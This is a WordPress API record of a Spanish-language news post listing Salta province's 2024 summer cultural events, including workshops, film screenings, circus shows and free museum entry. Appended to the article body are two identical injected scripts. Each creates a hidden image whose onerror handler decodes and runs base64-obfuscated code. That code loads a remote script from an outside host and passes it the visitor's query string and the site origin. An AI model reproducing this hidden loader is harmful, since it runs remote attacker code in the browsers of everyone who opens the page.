{"id":3546,"date":"2024-01-15T10:58:55","date_gmt":"2024-01-15T13:58:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3546"},"modified":"2025-08-14T00:02:06","modified_gmt":"2025-08-14T03:02:06","slug":"vacaciones-en-cultura-continuan-las-actividades-de-verano-para-saltenos-y-turistas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3546","title":{"rendered":"Vacaciones en Cultura: Contin\u00faan las actividades de verano para salte\u00f1os y turistas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-43978d2f3cb5ffa07c60bff176f3c756\" style=\"background-color:#6d063b\"><em>Talleres, juegos, espect\u00e1culos de m\u00fasica, danzas, son algunas de las propuestas que se pondr\u00e1n a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura durante los meses de enero y febrero.<\/em><\/h4>\n\n\n\n<p>El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades para todo p\u00fablico que se realizar\u00e1 hasta el 24 de febrero en los diferentes espacios de la Secretar\u00eda de Cultura y m\u00e1s de 28 municipios de la provincia. Tambi\u00e9n, durante ese periodo, los museos provinciales tendr\u00e1n entrada libre y gratuita para salte\u00f1os y residentes en Salta.<\/p>\n\n\n\n<p>El&nbsp;<strong>secretario de Cultura, Diego Ashur<\/strong>, manifest\u00f3: \u201cestamos muy contentos de anunciar las diferentes actividades culturales con las que contar\u00e1n salte\u00f1os y turistas para disfrutar del verano en Salta\u201d; y agreg\u00f3 que \u201cel calendario cuenta con la presencia de m\u00e1s de 28 municipios que dan cuenta del car\u00e1cter federal y participativo del Gobierno de la Provincia\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"905\" height=\"600\" data-id=\"3548\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga.jpg\" alt=\"\" class=\"wp-image-3548\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga.jpg 905w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5867-clases-de-yoga-634x420.jpg 634w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"905\" height=\"600\" data-id=\"3547\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra.jpg\" alt=\"\" class=\"wp-image-3547\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra.jpg 905w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra-768x509.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra-696x461.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/01\/5868-muestra-634x420.jpg 634w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>CONOC\u00c9 EL CALENDARIO DE VACACIONES EN CULTURA 2024:<\/p>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/1CMN1LOoJYeKoT73VKCJqhSqiBIfYArih\/view?usp=sharing\">https:\/\/drive.google.com\/file\/d\/1CMN1LOoJYeKoT73VKCJqhSqiBIfYArih\/view?usp=sharing<\/a><\/p>\n\n\n\n<p><strong>Vacaciones en Cultura<\/strong><\/p>\n\n\n\n<p><strong>Hasta el 15 de febrero<\/strong><\/p>\n\n\n\n<p>Feria de Artesanos en la Casa de la Cultura. De 9 a 21 horas hasta el 15 de enero, con entrada libre y gratuita en el Hall de Caseros 460. Muestra apta para todo p\u00fablico.<\/p>\n\n\n\n<p><strong>Lunes 15 de enero<\/strong><\/p>\n\n\n\n<p>CACHI &#8211; Se habilita la muestra \u201cCuriosidades de la arqueolog\u00eda en los valles\u201d de 9 a 16, sin costo adicional en el SUM del Museo Arqueol\u00f3gico P\u00edo Pablo D\u00edaz dirigido al p\u00fablico en general.<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 17 de enero<\/strong><\/p>\n\n\n\n<p>14:30 H &#8211; Taller de Cer\u00e1mica en el Mercado Artesanal de Salta. Los cursos se realizan los d\u00edas mi\u00e9rcoles y viernes.<\/p>\n\n\n\n<p>18 H &#8211; Biblioteca Provincial, Dr. Victorino de la Plaza, Av. Belgrano 1002 realizar\u00e1 el taller \u201cUna voz que cuenta\u201d a cargo de Luciana Lucero.<\/p>\n\n\n\n<p>21 H \u2013 Se proyectar\u00e1 en la Usina Cultural \u201cEl Pr\u00f3fugo\u201d. Actividad apta para todo p\u00fablico con entrada libre y gratuita.<\/p>\n\n\n\n<p>LAS LAJITAS, ANTA &#8211; Se llevar\u00e1 a cabo un taller de cine comunitario con proyecciones y pr\u00e1cticas de producci\u00f3n audiovisual. La actividad se realiza con el objetivo de difundir los cortos ganadores del 2023 a partir de las 19 h en el anfiteatro principal del municipio. Podr\u00e1s aprender las t\u00e9cnicas y modalidades para crear cine comunitario.<\/p>\n\n\n\n<p>ROSARIO DE LA FRONTERA &#8211; Muestra taller \u201cCultura y Democracia\u201d en diferentes espacios culturales del Municipio.<\/p>\n\n\n\n<p>SAN CARLOS &#8211; A las 16 H en la Plaza 4 de noviembre se tendr\u00e1 lugar el Bingo Literario en el marco de la 43\u00b0 Feria Artesanal de los Valles Calchaqu\u00edes<\/p>\n\n\n\n<p><strong>Jueves 18 de enero<\/strong><\/p>\n\n\n\n<p>Exhibici\u00f3n de Hip Hop en la Usina Cultural, de 19 a 21 H. Actividad a cargo de Gotea la chapa \/ Rulapsus.<\/p>\n\n\n\n<p>SAN CARLOS &#8211; Taller de Circo para ni\u00f1os con entrada libre y gratuita de 10 a 12 H a cargo de Julivan Circo. A las 19 H tendr\u00e1 lugar una funci\u00f3n para toda la Comunidad en la Plaza IV de Noviembre en el Marco de la 43o Feria Artesanal de los Valles Calchaqu\u00edes<\/p>\n\n\n\n<p>CAMPO QUIJANO &#8211; A las 23 H, se realizar\u00e1 el taller muestra para infancias \u201cToma I\u201d a cargo de Ignacio Sim\u00f3n Baeza en la Casa de la Cultura<\/p>\n\n\n\n<p><strong>Viernes 19 de enero<\/strong><\/p>\n\n\n\n<p>El Museo Antropol\u00f3gico de Salta propone \u201cJuguemos en el MAS\u201d al pie del cerro San Bernardo. Se trata de un taller de confecci\u00f3n de juguetes ind\u00edgenas. A partir de las 18 H, sin costo en el Sal\u00f3n de Muestra Permanente del MAS ubicado en la terraza del mismo. Actividad para personas de 5 a 10 a\u00f1os de edad con cupo.<\/p>\n\n\n\n<p>Desde las 17 hasta las 21 h, se realizar\u00e1 el curso para ser DJ a cargo de Lucia Brand\u00e1n en la Usina Cultural, Espa\u00f1a 1-98. A partir de las 21, en el Anfiteatro de la Usina con entrada libre y gratuita tendr\u00e1 lugar el espect\u00e1culo de M\u00fasica de Gast\u00f3n Mineti Singulares<\/p>\n\n\n\n<p>EL GALP\u00d3N&nbsp;&#8211; Proyecci\u00f3n de cortos documentales de Cine Comunitario a las 20 hs en el Sal\u00f3n Cultural del Municipio.<\/p>\n\n\n\n<p>CAMPO QUIJANO &#8211; A las 23 H, se realizar\u00e1 el taller muestra para infancias \u201cToma I\u201d a cargo de Ignacio Sim\u00f3n Baeza en la Casa de la Cultura<\/p>\n\n\n\n<p><strong>S\u00e1bado 20 de enero<\/strong><\/p>\n\n\n\n<p>A partir de las 10 hasta las 11:30 en la Plaza de la Usina se brindar\u00e1n clases de yoga a cargo de \u201cBienestar Santosha\u201d.<\/p>\n\n\n\n<p>Desde las 10, en el Sal\u00f3n de Usos M\u00faltiples, se realizar\u00e1 el taller de circo para infancias a cargo de Ana Garc\u00eda.<\/p>\n\n\n\n<p>A las 15, se realizar\u00e1 una clase abierta de yoga en el Sal\u00f3n de Usos M\u00faltiples de la Usina. Actividad a cargo de Paola Ret.<\/p>\n\n\n\n<p>Desde las 20 hasta las 22:30 H, se realizar\u00e1 la feria literaria a cargo de Noelia Fath y el Bar de Letras en la zona del Anfiteatro en la Usina Cultural, Espa\u00f1a 1-98.<\/p>\n\n\n\n<p>CAMPO QUIJANO &#8211; A las 23 H, se realizar\u00e1 el taller muestra para infancias \u201cToma I\u201d a cargo de Ignacio Sim\u00f3n Baeza en la Casa de la Cultura.<\/p>\n\n\n\n<p>LA CANDELARIA &#8211; Se realizar\u00e1 la Apertura del Camping Municipal de 10 a 19, actividad apta para todo p\u00fablico sin l\u00edmite de edad.<\/p>\n\n\n\n<p>LA CALDERA &#8211; Se realizar\u00e1 el evento de Apertura de Temporada en el Camping Municipal, actividad apta para todo p\u00fablico sin l\u00edmite de edad.<\/p>\n\n\n\n<p><strong>Domingo 21 de enero<\/strong><\/p>\n\n\n\n<p>GUACHIPAS &#8211; El Circo Aruna realizar\u00e1 una funci\u00f3n de 18 a 20 H, a cargo de Ana Garcia Villalva. La funci\u00f3n tendr\u00e1 lugar en el Centro Cultural de Calle Arenales S\/N.<\/p>\n\n\n\n<p>CAMPO QUIJANO &#8211; A las 23 H, se realizar\u00e1 el taller muestra para infancias \u201cToma I\u201d a cargo de Ignacio Sim\u00f3n Baeza en la Casa de la Cultura<\/p>\n\n\n\n<p><strong>VISITAS GUIADAS<\/strong><\/p>\n\n\n\n<p><strong>FINCA LA CRUZ<\/strong><\/p>\n\n\n\n<p>Visitas de martes a domingos de 10 a 18 h. Entrada gratuita.<\/p>\n\n\n\n<p><strong>GRAL MOSCONI &#8211; MUSEO PARODI BUSTOS<\/strong><\/p>\n\n\n\n<p>Muestra Grupo Expedicionario Mosconi: De martes a domingos. Hs. 09:00 a 17:00. Sala I.<\/p>\n\n\n\n<p>Visitas guiadas de martes a domingos, desde las 09 hasta las 17 H. Sala I y II del Museo.<\/p>\n\n\n\n<p><strong>MET\u00c1N &#8211; SITIO ESTECO II<\/strong><\/p>\n\n\n\n<p>Visitas guiadas los d\u00edas martes a domingos. Desde las 8 hasta las 18 h, sin costo. Sitio Arqueol\u00f3gico y \u00c1rea de reserva, Municipio de Rio Piedras.<\/p>\n\n\n\n<p>Visitas guiadas en el Sitio Arqueol\u00f3gico y en el \u00c1rea de reserva para tener una visi\u00f3n m\u00e1s global de la historia y los sucesos acaecidos en la Ciudad Colonial Nuestra Se\u00f1ora de Talavera de Madrid fundada en el a\u00f1o 1609 y abandonada en el a\u00f1o 1692.<\/p>\n\n\n\n<p>Hasta el 24 de febrero del 2024, los museos provinciales contar\u00e1n con entrada libre y gratuita para salte\u00f1os y residentes en la Provincia.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vacaciones-en-cultura-continuan-las-actividades-de-verano-para-saltenios-y-turistas-93785\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Talleres, juegos, espect\u00e1culos de m\u00fasica, danzas, son algunas de las propuestas que se pondr\u00e1n a disposici\u00f3n de salte\u00f1os y turistas sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura durante los meses de enero y febrero. El ciclo Cultura en Vacaciones 2024 propone un calendario de actividades para todo p\u00fablico que [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3549,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3546","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3546"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3546"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3546\/revisions"}],"predecessor-version":[{"id":6873,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3546\/revisions\/6873"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3549"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3546"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}